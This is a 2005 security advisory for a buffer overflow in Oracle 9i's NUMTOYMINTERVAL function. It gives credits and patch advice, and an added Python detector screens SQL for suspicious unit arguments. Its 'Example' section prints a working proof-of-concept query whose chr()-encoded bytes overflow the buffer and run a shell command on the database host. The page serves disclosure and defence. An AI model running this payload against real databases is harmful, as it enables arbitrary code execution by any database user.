Buffer Overflow in NUMTOYMINTERVAL in Oracle 9i
Name | Buffer Overflow Oracle NUMTOYMINTERVAL in Oracle 9i (up to 9.2.0.3)
Systems Affected | Oracle 9i
Severity | High Risk
Category | Buffer Overflow
Vendor URL | http://www.oracle.com/
Credit | Cesar Cerrudo (<argeniss>dot<com) / Mark Litchfield (<mark at ngssoftware.com>)
Exploit | http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/016789.html
Exploit | http://www.ngssoftware.com/advisories/ora_numtoyminterval.txt
Date | 14 May 2005 (V 1.00)
Details
The NUMTOYMINTERVAL function contains a buffer overflow. Any database user can exploit this vulnerability to execute arbitrary code. The vulnerability can also be exploited via SQL injection.
Example
SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||
chr(52) ||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)
||'echo ARE YOU SURE? >c:\Unbreakable.txt')
FROM DUAL;
Patch Information
Apply Oracle patchset 9.2.0.4 or later.
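Until the patchset is applied, audited or proxied SQL can be screened for NUMTOYMINTERVAL calls whose second argument is not a plain 'YEAR' or 'MONTH' literal. The following Python is an added example, not part of the original advisory: the function names and sample statements are constructed for illustration, and the list of valid units is taken from Oracle's SQL reference, not from this page.

```python
import re

# Oracle documents the second argument (interval unit) as 'YEAR' or 'MONTH',
# case-insensitive, surrounding blanks ignored. Anything else is worth review.
ALLOWED_UNITS = {"YEAR", "MONTH"}
CALL = re.compile(r"\bNUMTOYMINTERVAL\s*\(", re.IGNORECASE)

def split_args(sql, start):
    """Split the argument list that begins right after '(' at index start."""
    args, buf, depth, in_str = [], [], 0, False
    for ch in sql[start:]:
        if in_str:
            in_str = ch != "'"      # '' toggles off and on: still one literal
        elif ch == "'":
            in_str = True
        elif ch == "(":
            depth += 1
        elif ch == ")":
            if depth == 0:          # closing parenthesis of the call itself
                return args + ["".join(buf).strip()]
            depth -= 1
        elif ch == "," and depth == 0:
            args, buf = args + ["".join(buf).strip()], []
            continue
        buf.append(ch)
    return None                     # call was never closed

def suspicious_calls(sql):
    """Return (unit_argument, reason) for every call that needs review."""
    findings = []
    for m in CALL.finditer(sql):
        args = split_args(sql, m.end())
        if args is None or len(args) != 2:
            findings.append((None, "malformed argument list"))
            continue
        literal = re.fullmatch(r"'([^']*)'", args[1])
        if literal is None:         # concatenation, chr(), bind variable, ...
            findings.append((args[1], "unit is not a plain string literal"))
        elif literal.group(1).strip().upper() not in ALLOWED_UNITS:
            findings.append((args[1], "unit is not YEAR or MONTH"))
    return findings

SAMPLES = [  # constructed statements for illustration, not real audit data
    "SELECT hire_date + NUMTOYMINTERVAL(6,' month ') FROM emp",
    "SELECT NUMTOYMINTERVAL(1,'" + "A" * 48 + "'||chr(59)||'x') FROM DUAL",
    "SELECT numtoyminterval(1, 'DECADE') FROM DUAL",
]
if __name__ == "__main__":
    for stmt in SAMPLES:
        print(stmt[:60], "->", [reason for _, reason in suspicious_calls(stmt)])
```

Calls that pass the unit as a bind variable are also reported, because the value cannot be checked from the statement text alone.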
© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Definition Exploit
An exploit is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or denial of service (DoS) on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.